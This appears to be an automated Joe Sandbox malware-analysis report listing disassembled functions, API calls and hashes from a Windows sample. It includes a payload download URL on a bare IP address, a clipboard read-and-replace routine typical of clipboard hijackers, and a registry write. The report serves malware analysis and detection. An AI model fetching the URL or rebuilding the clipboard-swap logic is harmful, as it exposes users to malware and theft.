Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 02510E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02510223,?,?), ref: 02510E19
SetErrorMode.KERNEL32(00000000,?,?,02510223,?,?), ref: 02510E1E

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 766203355665eb35822e4e6e27981867ffec619eed77409d8595cbbd675d31de
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: A0D0123114512877DB002A95DC09BCD7F1CDF05B66F008011FB0DD9080C770954046E9

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 00404333 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00404343

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
Instruction ID: fec367d8aa59221bd54f7e77a34cd6e8baa5892bd02020f9b8e7ed08d49e55ed
Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
Instruction Fuzzy Hash: 71D067B1518611CEE764DF69E444656B7E4EF04310B24492FE4D9D2694E6749880CB44

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 00B3E8F5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00B3E946

Memory Dump Source

Source File: 00000000.00000002.4104016383.0000000000B3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b3e000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: fbf26567a2bda96aa288f95c151ac1ee03d14c945cf212b9ba67385cedb27fdf
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 46113C79A00208EFDB01DF98C985E98BBF5EF08350F158095F9589B362D371EA50DF80

Non-executed Functions

Function 02511942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0251194D
Sleep.KERNEL32(00001541), ref: 02511957

Part of subcall function 0251CE77: _strlen.LIBCMT ref: 0251CE8E

OpenClipboard.USER32(00000000), ref: 02511984
GetClipboardData.USER32(00000001), ref: 02511994
_strlen.LIBCMT ref: 025119B0
_strlen.LIBCMT ref: 025119DF
_strlen.LIBCMT ref: 02511B23
EmptyClipboard.USER32 ref: 02511B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 02511B46
GlobalUnlock.KERNEL32(00000000), ref: 02511B70
SetClipboardData.USER32(00000001,00000000), ref: 02511B79
GlobalFree.KERNEL32(00000000), ref: 02511B80
CloseClipboard.USER32 ref: 02511BA4
Sleep.KERNEL32(000002D2), ref: 02511BAF

Strings

i, xrefs: 025119C0
4#E, xrefs: 0251195D

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: 0401eb5516cf6aa583282c32ead70777188f9979bc7818b1009624df97e50899
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 7C511431C007859AE3129FA4EC45BFC7B74FF5A306F049265D905A2172EB709A81CB6E

Function 02512361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0251239C
GetClientRect.USER32(?,?), ref: 025123B1
GetDC.USER32(?), ref: 025123B8
CreateSolidBrush.GDI32(00646464), ref: 025123CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 025123EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0251240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02512416
MulDiv.KERNEL32(00000008,00000000), ref: 0251241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02512443
SetBkMode.GDI32(?,00000001), ref: 025124CE
_wcslen.LIBCMT ref: 025124E6

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: 29ea01d46f267746dd62d51600f4c21c6947e65701d0584ee139a18904438cf6
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: EC71FD72900228AFDB229F64DD85FAEB7BCFB09711F0051A5F509E6151DA70AF80CF64

Function 0254B9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0254BCF4,?,00000000), ref: 0254BA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0254BCF4,?,00000000), ref: 0254BA97
GetACP.KERNEL32(?,?,0254BCF4,?,00000000), ref: 0254BAAC

Strings

OCP, xrefs: 0254BA29
ACP, xrefs: 0254B9F3

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: c1680856338cf96d19086719078f546e4fd76804d521be5086873fd2706b5e78
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: CE21B832E04105AADB34CF56D905BA7FBA6FB44E1CB468466E909D7100FF32DE40C358

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

ACP, xrefs: 0043B78C
OCP, xrefs: 0043B7C2

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 0254BBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02542141: GetLastError.KERNEL32(?,?,0253A9EC,?,00000000,?,0253CDE6,0251247E,00000000,?,00451F20), ref: 02542145
Part of subcall function 02542141: _free.LIBCMT ref: 02542178
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421B9

Part of subcall function 02542141: _free.LIBCMT ref: 025421A0
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0254BCB5
IsValidCodePage.KERNEL32(00000000), ref: 0254BD10
IsValidLocale.KERNEL32(?,00000001), ref: 0254BD1F
GetLocaleInfoW.KERNEL32(?,00001001,02540A1C,00000040,?,02540B3C,00000055,00000000,?,?,00000055,00000000), ref: 0254BD67
GetLocaleInfoW.KERNEL32(?,00001002,02540A9C,00000040), ref: 0254BD86

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: 67af6d0812adffd9834865f99dbeadd4ab8163f0133a88a40ac49880bde3dcc1
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: 7D517271D0020BABDB10DFA5DC84ABAFBB9BF5470DF140569E904E7290EF71DA018B69

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

